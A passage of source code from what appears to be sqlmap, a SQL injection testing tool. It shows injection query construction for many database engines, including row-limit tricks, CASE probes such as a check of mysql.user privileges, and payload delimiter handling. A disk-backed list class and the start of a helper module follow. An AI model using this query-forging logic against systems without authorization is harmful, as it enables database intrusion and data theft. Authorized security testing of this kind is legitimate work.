Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.RAIMA):\n            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)\n            limitedQuery += \" %s\" % limitStr\n\n        elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,):\n            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)\n            limitedQuery += \" %s\" % limitStr\n\n        elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):\n            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)\n            limitedQuery += \" %s\" % limitStr\n\n        elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):\n            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)\n            if query.startswith(\"SELECT \"):\n                limitedQuery = query.replace(\"SELECT \", \"SELECT %s \" % limitStr, 1)\n\n        elif Backend.getIdentifiedDbms() in (DBMS.MONETDB,):\n            if query.startswith(\"SELECT \") and field is not None and field in query:\n                original = query.split(\"SELECT \", 1)[1].split(\" FROM\", 1)[0]\n                for part in original.split(','):\n                    if re.search(r\"\\b%s\\b\" % re.escape(field), part):\n                        _ = re.sub(r\"SELECT.+?FROM\", \"SELECT %s AS z,row_number() over() AS y FROM\" % part, query, 1)\n                        replacement = \"SELECT x.z FROM (%s)x WHERE x.y-1=%d\" % (_, num)\n                        limitedQuery = replacement\n                        break\n\n        elif Backend.isDbms(DBMS.HSQLDB):\n            match = re.search(r\"ORDER BY [^ ]+\", limitedQuery)\n            if match:\n                limitedQuery = re.sub(r\"\\s*%s\\s*\" % re.escape(match.group(0)), \" \", limitedQuery).strip()\n                limitedQuery += \" %s\" % match.group(0)\n\n            if query.startswith(\"SELECT \"):\n                limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)\n                limitedQuery = limitedQuery.replace(\"SELECT \", \"SELECT %s \" % limitStr, 1)\n            else:\n                limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num)\n                limitedQuery += \" %s\" % limitStr\n\n            if not match:\n                match = re.search(r\"%s\\s+(\\w+)\" % re.escape(limitStr), limitedQuery)\n                if match:\n                    orderBy = \" ORDER BY %s\" % match.group(1)\n\n        elif Backend.isDbms(DBMS.CACHE):\n            match = re.search(r\"ORDER BY ([^ ]+)\\Z\", limitedQuery)\n            if match:\n                limitedQuery = re.sub(r\"\\s*%s\\s*\" % re.escape(match.group(0)), \" \", limitedQuery).strip()\n                orderBy = \" %s\" % match.group(0)\n                field = match.group(1)\n\n            limitedQuery = queries[Backend.getIdentifiedDbms()].limit.query % (1, field, limitedQuery, num)\n\n        elif Backend.isDbms(DBMS.FIREBIRD):\n            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1)\n            limitedQuery += \" %s\" % limitStr\n\n        elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):\n            if \" ORDER BY \" not in limitedQuery:\n                limitStr = limitStr.replace(\") WHERE LIMIT\", \" ORDER BY 1 ASC) WHERE LIMIT\")\n            elif \" ORDER BY \" in limitedQuery and \"SELECT \" in limitedQuery:\n                limitedQuery = limitedQuery[:limitedQuery.index(\" ORDER BY \")]\n\n            if query.startswith(\"SELECT \"):\n                delimiter = queries[Backend.getIdentifiedDbms()].delimiter.query\n                limitedQuery = \"%s FROM (%s,%s\" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)\n            else:\n                limitedQuery = \"%s FROM (SELECT %s,%s\" % (untilFrom, ','.join(f for f in field), limitStr)\n\n            limitedQuery = safeStringFormat(limitedQuery, (fromFrom,))\n            limitedQuery += \"=%d\" % (num + 1)\n\n        elif Backend.isDbms(DBMS.MSSQL):\n            forgeNotIn = True\n\n            if \" ORDER BY \" in limitedQuery:\n                orderBy = limitedQuery[limitedQuery.index(\" ORDER BY \"):]\n                limitedQuery = limitedQuery[:limitedQuery.index(\" ORDER BY \")]\n\n            notDistincts = re.findall(r\"DISTINCT[\\(\\s+](.+?)\\)*\\s+\", limitedQuery, re.I)\n\n            for notDistinct in notDistincts:\n                limitedQuery = limitedQuery.replace(\"DISTINCT(%s)\" % notDistinct, notDistinct)\n                limitedQuery = limitedQuery.replace(\"DISTINCT %s\" % notDistinct, notDistinct)\n\n            if limitedQuery.startswith(\"SELECT TOP \") or limitedQuery.startswith(\"TOP \"):\n                topNums = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, limitedQuery, re.I)\n\n                if topNums:\n                    topNums = topNums.groups()\n                    quantityTopNums = topNums[0]\n                    limitedQuery = limitedQuery.replace(\"TOP %s\" % quantityTopNums, \"TOP 1\", 1)\n                    startTopNums = topNums[1]\n                    limitedQuery = limitedQuery.replace(\" (SELECT TOP %s\" % startTopNums, \" (SELECT TOP %d\" % num)\n                    forgeNotIn = False\n                else:\n                    limitedQuery = re.sub(r\"\\bTOP\\s+\\d+\\s*\", \"\", limitedQuery, flags=re.I)\n\n            if forgeNotIn:\n                limitedQuery = limitedQuery.replace(\"SELECT \", (limitStr % 1), 1)\n\n                if \" ORDER BY \" not in fromFrom:\n                    # Reference: https://web.archive.org/web/20150218053955/http://vorg.ca/626-the-MS-SQL-equivalent-to-MySQLs-limit-command\n                    if \" WHERE \" in limitedQuery:\n                        limitedQuery = \"%s AND %s \" % (limitedQuery, self.nullAndCastField(uniqueField or field))\n                    else:\n                        limitedQuery = \"%s WHERE %s \" % (limitedQuery, self.nullAndCastField(uniqueField or field))\n\n                    limitedQuery += \"NOT IN (%s\" % (limitStr % num)\n                    limitedQuery += \"%s %s ORDER BY %s) ORDER BY %s\" % (self.nullAndCastField(uniqueField or field), fromFrom, uniqueField or '1', uniqueField or '1')\n                else:\n                    match = re.search(r\" ORDER BY (\\w+)\\Z\", query)\n                    field = match.group(1) if match else field\n\n                    if \" WHERE \" in limitedQuery:\n                        limitedQuery = \"%s AND %s \" % (limitedQuery, field)\n                    else:\n                        limitedQuery = \"%s WHERE %s \" % (limitedQuery, field)\n\n                    limitedQuery += \"NOT IN (%s\" % (limitStr % num)\n                    limitedQuery += \"%s %s)\" % (field, fromFrom)\n\n        if orderBy:\n            limitedQuery += orderBy\n\n        return limitedQuery\n\n    def forgeQueryOutputLength(self, expression):\n        lengthQuery = queries[Backend.getIdentifiedDbms()].length.query\n        select = re.search(r\"\\ASELECT\\s+\", expression, re.I)\n        selectFrom = re.search(r\"\\ASELECT\\s+(.+)\\s+FROM\\s+(.+)\", expression, re.I)\n        selectTopExpr = re.search(r\"\\ASELECT\\s+TOP\\s+[\\d]+\\s+(.+?)\\s+FROM\", expression, re.I)\n        selectMinMaxExpr = re.search(r\"\\ASELECT\\s+(MIN|MAX)\\(.+?\\)\\s+FROM\", expression, re.I)\n\n        _, _, _, _, _, _, fieldsStr, _ = self.getFields(expression)\n\n        if Backend.getIdentifiedDbms() in (DBMS.MCKOI,) and selectFrom:\n            lengthExpr = \"SELECT %s FROM %s\" % (lengthQuery % selectFrom.group(1), selectFrom.group(2))\n        elif selectTopExpr or selectMinMaxExpr:\n            lengthExpr = lengthQuery % (\"(%s)\" % expression)\n        elif select:\n            lengthExpr = expression.replace(fieldsStr, lengthQuery % fieldsStr, 1)\n        else:\n            lengthExpr = lengthQuery % expression\n\n        return unescaper.escape(lengthExpr)\n\n    def forgeCaseStatement(self, expression):\n        \"\"\"\n        Take in input a query string and return its CASE statement query\n        string.\n\n        Example:\n\n        Input:  (SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'\n        Output: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y') THEN 1 ELSE 0 END)\n\n        @param expression: expression to be processed\n        @type num: C{str}\n\n        @return: processed expression\n        @rtype: C{str}\n        \"\"\"\n\n        caseExpression = expression\n\n        if Backend.getIdentifiedDbms() is not None:\n            caseExpression = queries[Backend.getIdentifiedDbms()].case.query % expression\n\n            if \"(IIF\" not in caseExpression and Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not caseExpression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]):\n                caseExpression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]\n\n        return caseExpression\n\n    def addPayloadDelimiters(self, value):\n        \"\"\"\n        Adds payload delimiters around the input string\n        \"\"\"\n\n        return \"%s%s%s\" % (PAYLOAD_DELIMITER, value, PAYLOAD_DELIMITER) if value else value\n\n    def removePayloadDelimiters(self, value):\n        \"\"\"\n        Removes payload delimiters from inside the input string\n        \"\"\"\n\n        return value.replace(PAYLOAD_DELIMITER, \"\") if value else value\n\n    def extractPayload(self, value):\n        \"\"\"\n        Extracts payload from inside of the input string\n        \"\"\"\n\n        _ = re.escape(PAYLOAD_DELIMITER)\n        return extractRegexResult(r\"(?s)%s(?P<result>.*?)%s\" % (_, _), value)\n\n    def replacePayload(self, value, payload):\n        \"\"\"\n        Replaces payload inside the input string with a given payload\n        \"\"\"\n\n        _ = re.escape(PAYLOAD_DELIMITER)\n        return re.sub(r\"(?s)(%s.*?%s)\" % (_, _), (\"%s%s%s\" % (PAYLOAD_DELIMITER, getUnicode(payload), PAYLOAD_DELIMITER)).replace(\"\\\\\", r\"\\\\\"), value) if value else value\n\n    def runAsDBMSUser(self, query):\n        if conf.dbmsCred and \"Ad Hoc Distributed Queries\" not in query:\n            query = getSQLSnippet(DBMS.MSSQL, \"run_statement_as_user\", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace(\"'\", \"''\"))\n\n        return query\n\n    def whereQuery(self, query):\n        if conf.dumpWhere and query:\n            if Backend.isDbms(DBMS.ORACLE) and re.search(r\"qq ORDER BY \\w+\\)\", query, re.I) is not None:\n                prefix, suffix = re.sub(r\"(?i)(qq)( ORDER BY \\w+\\))\", r\"\\g<1> WHERE %s\\g<2>\" % conf.dumpWhere, query), \"\"\n            else:\n                match = re.search(r\" (LIMIT|ORDER).+\", query, re.I)\n                if match:\n                    suffix = match.group(0)\n                    prefix = query[:-len(suffix)]\n                else:\n                    prefix, suffix = query, \"\"\n\n            if conf.tbl and \"%s)\" % conf.tbl.upper() in prefix.upper():\n                prefix = re.sub(r\"(?i)%s\\)\" % re.escape(conf.tbl), \"%s WHERE %s)\" % (conf.tbl, conf.dumpWhere), prefix)\n            elif re.search(r\"(?i)\\bWHERE\\b\", prefix):\n                prefix += \" AND %s\" % conf.dumpWhere\n            else:\n                prefix += \" WHERE %s\" % conf.dumpWhere\n\n            query = prefix\n            if suffix and not all(re.search(r\"ORDER BY\", _, re.I) is not None for _ in (query, suffix)):\n                query += suffix\n\n        return query\n\n# SQL agent\nagent = Agent()\n"
  },
  {
    "path": "sqlmap/lib/core/bigarray.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import cPickle as pickle\nexcept:\n    import pickle\n\nimport itertools\nimport os\nimport sys\nimport tempfile\nimport zlib\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.settings import BIGARRAY_CHUNK_SIZE\nfrom lib.core.settings import BIGARRAY_COMPRESS_LEVEL\n\ntry:\n    DEFAULT_SIZE_OF = sys.getsizeof(object())\nexcept TypeError:\n    DEFAULT_SIZE_OF = 16\n\ndef _size_of(instance):\n    \"\"\"\n    Returns total size of a given instance / object (in bytes)\n    \"\"\"\n\n    retval = sys.getsizeof(instance, DEFAULT_SIZE_OF)\n\n    if isinstance(instance, dict):\n        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(instance.items()))\n    elif hasattr(instance, \"__iter__\"):\n        retval += sum(_size_of(_) for _ in instance if _ != instance)\n\n    return retval\n\nclass Cache(object):\n    \"\"\"\n    Auxiliary class used for storing cached chunks\n    \"\"\"\n\n    def __init__(self, index, data, dirty):\n        self.index = index\n        self.data = data\n        self.dirty = dirty\n\nclass BigArray(list):\n    \"\"\"\n    List-like class used for storing large amounts of data (disk cached)\n\n    >>> _ = BigArray(xrange(100000))\n    >>> _[20] = 0\n    >>> _[99999]\n    99999\n    >>> _ += [0]\n    >>> _[100000]\n    0\n    >>> _ = _ + [1]\n    >>> _[-1]\n    1\n    \"\"\"\n\n    def __init__(self, items=None):\n        self.chunks = [[]]\n        self.chunk_length = sys.maxsize\n        self.cache = None\n        self.filenames = set()\n        self._os_remove = os.remove\n        self._size_counter = 0\n\n        for item in (items or []):\n            self.append(item)\n\n    def __add__(self, value):\n        retval = BigArray(self)\n\n        for _ in value:\n            retval.append(_)\n\n        return retval\n\n    def __iadd__(self, value):\n        for _ in value:\n            self.append(_)\n\n        return self\n\n    def append(self, value):\n        self.chunks[-1].append(value)\n\n        if self.chunk_length == sys.maxsize:\n            self._size_counter += _size_of(value)\n            if self._size_counter >= BIGARRAY_CHUNK_SIZE:\n                self.chunk_length = len(self.chunks[-1])\n                self._size_counter = None\n\n        if len(self.chunks[-1]) >= self.chunk_length:\n            filename = self._dump(self.chunks[-1])\n            self.chunks[-1] = filename\n            self.chunks.append([])\n\n    def extend(self, value):\n        for _ in value:\n            self.append(_)\n\n    def pop(self):\n        if len(self.chunks[-1]) < 1:\n            self.chunks.pop()\n            try:\n                with open(self.chunks[-1], \"rb\") as f:\n                    self.chunks[-1] = pickle.loads(zlib.decompress(f.read()))\n            except IOError as ex:\n                errMsg = \"exception occurred while retrieving data \"\n                errMsg += \"from a temporary file ('%s')\" % ex\n                raise SqlmapSystemException(errMsg)\n\n        return self.chunks[-1].pop()\n\n    def index(self, value):\n        for index in xrange(len(self)):\n            if self[index] == value:\n                return index\n\n        return ValueError, \"%s is not in list\" % value\n\n    def _dump(self, chunk):\n        try:\n            handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)\n            self.filenames.add(filename)\n            os.close(handle)\n            with open(filename, \"w+b\") as f:\n                f.write(zlib.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))\n            return filename\n        except (OSError, IOError) as ex:\n            errMsg = \"exception occurred while storing data \"\n            errMsg += \"to a temporary file ('%s'). Please \" % ex\n            errMsg += \"make sure that there is enough disk space left. If problem persists, \"\n            errMsg += \"try to set environment variable 'TEMP' to a location \"\n            errMsg += \"writeable by the current user\"\n            raise SqlmapSystemException(errMsg)\n\n    def _checkcache(self, index):\n        if (self.cache and self.cache.index != index and self.cache.dirty):\n            filename = self._dump(self.cache.data)\n            self.chunks[self.cache.index] = filename\n\n        if not (self.cache and self.cache.index == index):\n            try:\n                with open(self.chunks[index], \"rb\") as f:\n                    self.cache = Cache(index, pickle.loads(zlib.decompress(f.read())), False)\n            except Exception as ex:\n                errMsg = \"exception occurred while retrieving data \"\n                errMsg += \"from a temporary file ('%s')\" % ex\n                raise SqlmapSystemException(errMsg)\n\n    def __getstate__(self):\n        return self.chunks, self.filenames\n\n    def __setstate__(self, state):\n        self.__init__()\n        self.chunks, self.filenames = state\n\n    def __getitem__(self, y):\n        while y < 0:\n            y += len(self)\n\n        index = y // self.chunk_length\n        offset = y % self.chunk_length\n        chunk = self.chunks[index]\n\n        if isinstance(chunk, list):\n            return chunk[offset]\n        else:\n            self._checkcache(index)\n            return self.cache.data[offset]\n\n    def __setitem__(self, y, value):\n        index = y // self.chunk_length\n        offset = y % self.chunk_length\n        chunk = self.chunks[index]\n\n        if isinstance(chunk, list):\n            chunk[offset] = value\n        else:\n            self._checkcache(index)\n            self.cache.data[offset] = value\n            self.cache.dirty = True\n\n    def __repr__(self):\n        return \"%s%s\" % (\"...\" if len(self.chunks) > 1 else \"\", self.chunks[-1].__repr__())\n\n    def __iter__(self):\n        for i in xrange(len(self)):\n            yield self[i]\n\n    def __len__(self):\n        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])\n"
  },
  {
    "path": "sqlmap/lib/core/common.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport binascii\nimport codecs\nimport contextlib\nimport copy\nimport functools\nimport getpass\nimport hashlib\nimport inspect\nimport io\nimport json\nimport keyword\nimport locale\nimport logging\nimport ntpath\nimport os\nimport platform\nimport posixpath\nimport random\nimport re\nimport socket\nimport string\nimport subprocess\nimport sys\nimport tempfile\nimport threading\nimport time\nimport types\nimport unicodedata\n\nfrom difflib import SequenceMatcher\nfrom math import sqrt\nfrom optparse import OptionValueError\nfrom xml.sax import parse\nfrom xml.sax import SAXParseException\n\nfrom extra.beep.beep import beep\nfrom extra.cloak.cloak import decloak\nfrom lib.core.bigarray import BigArray\nfrom lib.core.compat import cmp\nfrom lib.core.compat import LooseVersion\nfrom lib.core.compat import round\nfrom lib.core.compat import xrange\nfrom lib.core.convert import base64pickle\nfrom lib.core.convert import base64unpickle\nfrom lib.core.convert import decodeBase64\nfrom lib.core.convert import decodeHex\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.convert import getUnicode\nfrom lib.core.convert import htmlUnescape\nfrom lib.core.convert import stdoutEncode\nfrom lib.core.data import cmdLineOptions\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.datatype import OrderedSet\nfrom lib.core.decorators import cachedmethod\nfrom lib.core.defaults import defaults\nfrom lib.core.dicts import DBMS_DICT\nfrom lib.core.dicts import DEFAULT_DOC_ROOTS\nfrom lib.core.dicts import DEPRECATED_OPTIONS\nfrom lib.core.dicts import OBSOLETE_OPTIONS\nfrom lib.core.dicts import SQL_STATEMENTS\nfrom lib.core.enums import ADJUST_TIME_DELAY\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import CONTENT_STATUS\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HEURISTIC_TEST\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import LOGGING_LEVELS\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.enums import OPTION_TYPE\nfrom lib.core.enums import OS\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import POST_HINT\nfrom lib.core.enums import REFLECTIVE_COUNTER\nfrom lib.core.enums import SORT_ORDER\nfrom lib.core.exception import SqlmapBaseException\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapGenericException\nfrom lib.core.exception import SqlmapInstallationException\nfrom lib.core.exception import SqlmapMissingDependence\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapSilentQuitException\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.exception import SqlmapValueException\nfrom lib.core.log import LOGGER_HANDLER\nfrom lib.core.optiondict import optDict\nfrom lib.core.settings import BANNER\nfrom lib.core.settings import BOLD_PATTERNS\nfrom lib.core.settings import BOUNDARY_BACKSLASH_MARKER\nfrom lib.core.settings import BOUNDED_INJECTION_MARKER\nfrom lib.core.settings import BRUTE_DOC_ROOT_PREFIXES\nfrom lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES\nfrom lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK\nfrom lib.core.settings import BURP_REQUEST_REGEX\nfrom lib.core.settings import BURP_XML_HISTORY_REGEX\nfrom lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS\nfrom lib.core.settings import CUSTOM_INJECTION_MARK_CHAR\nfrom lib.core.settings import DBMS_DIRECTORY_DICT\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import DEFAULT_MSSQL_SCHEMA\nfrom lib.core.settings import DEV_EMAIL_ADDRESS\nfrom lib.core.settings import DOLLAR_MARKER\nfrom lib.core.settings import DUMMY_USER_INJECTION\nfrom lib.core.settings import DYNAMICITY_BOUNDARY_LENGTH\nfrom lib.core.settings import ERROR_PARSING_REGEXES\nfrom lib.core.settings import EVALCODE_ENCODED_PREFIX\nfrom lib.core.settings import FILE_PATH_REGEXES\nfrom lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME\nfrom lib.core.settings import FORM_SEARCH_REGEX\nfrom lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES\nfrom lib.core.settings import GIT_PAGE\nfrom lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN\nfrom lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX\nfrom lib.core.settings import HASHDB_MILESTONE_VALUE\nfrom lib.core.settings import HOST_ALIASES\nfrom lib.core.settings import HTTP_CHUNKED_SPLIT_KEYWORDS\nfrom lib.core.settings import IGNORE_PARAMETERS\nfrom lib.core.settings import IGNORE_SAVE_OPTIONS\nfrom lib.core.settings import INFERENCE_UNKNOWN_CHAR\nfrom lib.core.settings import IP_ADDRESS_REGEX\nfrom lib.core.settings import ISSUES_PAGE\nfrom lib.core.settings import IS_TTY\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import LARGE_OUTPUT_THRESHOLD\nfrom lib.core.settings import LOCALHOST\nfrom lib.core.settings import MAX_INT\nfrom lib.core.settings import MIN_ENCODED_LEN_CHECK\nfrom lib.core.settings import MIN_ERROR_PARSING_NON_WRITING_RATIO\nfrom lib.core.settings import MIN_TIME_RESPONSES\nfrom lib.core.settings import MIN_VALID_DELAYED_RESPONSE\nfrom lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PARAMETER_AMP_MARKER\nfrom lib.core.settings import PARAMETER_SEMICOLON_MARKER\nfrom lib.core.settings import PARAMETER_PERCENTAGE_MARKER\nfrom lib.core.settings import PARTIAL_HEX_VALUE_MARKER\nfrom lib.core.settings import PARTIAL_VALUE_MARKER\nfrom lib.core.settings import PAYLOAD_DELIMITER\nfrom lib.core.settings import PLATFORM\nfrom lib.core.settings import PRINTABLE_CHAR_REGEX\nfrom lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS\nfrom lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT\nfrom lib.core.settings import PYVERSION\nfrom lib.core.settings import RANDOMIZATION_TLDS\nfrom lib.core.settings import REFERER_ALIASES\nfrom lib.core.settings import REFLECTED_BORDER_REGEX\nfrom lib.core.settings import REFLECTED_MAX_REGEX_PARTS\nfrom lib.core.settings import REFLECTED_REPLACEMENT_REGEX\nfrom lib.core.settings import REFLECTED_REPLACEMENT_TIMEOUT\nfrom lib.core.settings import REFLECTED_VALUE_MARKER\nfrom lib.core.settings import REFLECTIVE_MISS_THRESHOLD\nfrom lib.core.settings import SENSITIVE_DATA_REGEX\nfrom lib.core.settings import SENSITIVE_OPTIONS\nfrom lib.core.settings import STDIN_PIPE_DASH\nfrom lib.core.settings import SUPPORTED_DBMS\nfrom lib.core.settings import TEXT_TAG_REGEX\nfrom lib.core.settings import TIME_STDEV_COEFF\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.settings import UNKNOWN_DBMS_VERSION\nfrom lib.core.settings import URI_QUESTION_MARKER\nfrom lib.core.settings import URLENCODE_CHAR_LIMIT\nfrom lib.core.settings import URLENCODE_FAILSAFE_CHARS\nfrom lib.core.settings import USER_AGENT_ALIASES\nfrom lib.core.settings import VERSION_COMPARISON_CORRECTION\nfrom lib.core.settings import VERSION_STRING\nfrom lib.core.settings import ZIP_HEADER\nfrom lib.core.settings import WEBSCARAB_SPLITTER\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.utils.safe2bin import safecharencode\nfrom lib.utils.sqlalchemy import _sqlalchemy\nfrom thirdparty import six\nfrom thirdparty.clientform.clientform import ParseResponse\nfrom thirdparty.clientform.clientform import ParseError\nfrom thirdparty.colorama.initialise import init as coloramainit\nfrom thirdparty.magic import magic\nfrom thirdparty.odict import OrderedDict\nfrom thirdparty.six import unichr as _unichr\nfrom thirdparty.six.moves import collections_abc as _collections\nfrom thirdparty.six.moves import configparser as _configparser\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import input as _input\nfrom thirdparty.six.moves import reload_module as _reload_module\nfrom thirdparty.six.moves import urllib as _urllib\nfrom thirdparty.six.moves import zip as _zip\nfrom thirdparty.termcolor.termcolor import colored\n\nclass UnicodeRawConfigParser(_configparser.RawConfigParser):\n    \"\"\"\n    RawConfigParser with unicode writing support\n    \"\"\"\n\n    def write(self, fp):\n        \"\"\"\n        Write an .ini-format representation of the configuration state.\n        \"\"\"\n\n        if self._defaults:\n            fp.write(\"[%s]\\n\" % _configparser.DEFAULTSECT)\n\n            for (key, value) in self._defaults.items():\n                fp.write(\"%s = %s\" % (key, getUnicode(value, UNICODE_ENCODING)))\n\n            fp.write(\"\\n\")\n\n        for section in self._sections:\n            fp.write(\"[%s]\\n\" % section)\n\n            for (key, value) in self._sections[section].items():\n                if key != \"__name__\":\n                    if value is None:\n                        fp.write(\"%s\\n\" % (key))\n                    elif not isListLike(value):\n                        fp.write(\"%s = %s\\n\" % (key, getUnicode(value, UNICODE_ENCODING)))\n\n            fp.write(\"\\n\")\n\nclass Format(object):\n    @staticmethod\n    def humanize(values, chain=\" or \"):\n        return chain.join(values)\n\n    # Get methods\n    @staticmethod\n    def getDbms(versions=None):\n        \"\"\"\n        Format the back-end DBMS fingerprint value and return its\n        values formatted as a human readable string.\n\n        @return: detected back-end DBMS based upon fingerprint techniques.\n        @rtype: C{str}\n        \"\"\"\n\n        if versions is None and Backend.getVersionList():\n            versions = Backend.getVersionList()\n\n        return Backend.getDbms() if versions is None else \"%s %s\" % (Backend.getDbms(), \" and \".join(filterNone(versions)))\n\n    @staticmethod\n    def getErrorParsedDBMSes():\n        \"\"\"\n        Parses the knowledge base htmlFp list and return its values\n        formatted as a human readable string.\n\n        @return: list of possible back-end DBMS based upon error messages\n        parsing.\n        @rtype: C{str}\n        \"\"\"\n\n        htmlParsed = None\n\n        if len(kb.htmlFp) == 0 or kb.heuristicTest != HEURISTIC_TEST.POSITIVE:\n            pass\n        elif len(kb.htmlFp) == 1:\n            htmlParsed = kb.htmlFp[0]\n        elif len(kb.htmlFp) > 1:\n            htmlParsed = \" or \".join(kb.htmlFp)\n\n        return htmlParsed\n\n    @staticmethod\n    def getOs(target, info):\n        \"\"\"\n        Formats the back-end operating system fingerprint value\n        and return its values formatted as a human readable string.\n\n        Example of info (kb.headersFp) dictionary:\n\n        {\n          'distrib': set(['Ubuntu']),\n          'type': set(['Linux']),\n          'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),\n          'release': set(['8.10'])\n        }\n\n        Example of info (kb.bannerFp) dictionary:\n\n        {\n          'sp': set(['Service Pack 4']),\n          'dbmsVersion': '8.00.194',\n          'dbmsServicePack': '0',\n          'distrib': set(['2000']),\n          'dbmsRelease': '2000',\n          'type': set(['Windows'])\n        }\n\n        @return: detected back-end operating system based upon fingerprint\n        techniques.\n        @rtype: C{str}\n        \"\"\"\n\n        infoStr = \"\"\n        infoApi = {}\n\n        if info and \"type\" in info:\n            if conf.api:\n                infoApi[\"%s operating system\" % target] = info\n            else:\n                infoStr += \"%s operating system: %s\" % (target, Format.humanize(info[\"type\"]))\n\n                if \"distrib\" in info:\n                    infoStr += \" %s\" % Format.humanize(info[\"distrib\"])\n\n                if \"release\" in info:\n                    infoStr += \" %s\" % Format.humanize(info[\"release\"])\n\n                if \"sp\" in info:\n                    infoStr += \" %s\" % Format.humanize(info[\"sp\"])\n\n                if \"codename\" in info:\n                    infoStr += \" (%s)\" % Format.humanize(info[\"codename\"])\n\n        if \"technology\" in info:\n            if conf.api:\n                infoApi[\"web application technology\"] = Format.humanize(info[\"technology\"], \", \")\n            else:\n                infoStr += \"\\nweb application technology: %s\" % Format.humanize(info[\"technology\"], \", \")\n\n        if conf.api:\n            return infoApi\n        else:\n            return infoStr.lstrip()\n\nclass Backend(object):\n    @staticmethod\n    def setDbms(dbms):\n        dbms = aliasToDbmsEnum(dbms)\n\n        if dbms is None:\n            return None\n\n        # Little precaution, in theory this condition should always be false\n        elif kb.dbms is not None and kb.dbms != dbms:\n            warnMsg = \"there appears to be a high probability that \"\n            warnMsg += \"this could be a false positive case\"\n            logger.warning(warnMsg)\n\n            msg = \"sqlmap previously fingerprinted back-end DBMS as \"\n            msg += \"%s. However now it has been fingerprinted \" % kb.dbms\n            msg += \"as %s. \" % dbms\n            msg += \"Please, specify which DBMS should be \"\n            msg += \"correct [%s (default)/%s] \" % (kb.dbms, dbms)\n\n            while True:\n                choice = readInput(msg, default=kb.dbms)\n\n                if aliasToDbmsEnum(choice) == kb.dbms:\n                    kb.dbmsVersion = []\n                    kb.resolutionDbms = kb.dbms\n                    break\n                elif aliasToDbmsEnum(choice) == dbms:\n                    kb.dbms = aliasToDbmsEnum(choice)\n                    break\n                else:\n                    warnMsg = \"invalid value\"\n                    logger.warning(warnMsg)\n\n        elif kb.dbms is None:\n            kb.dbms = 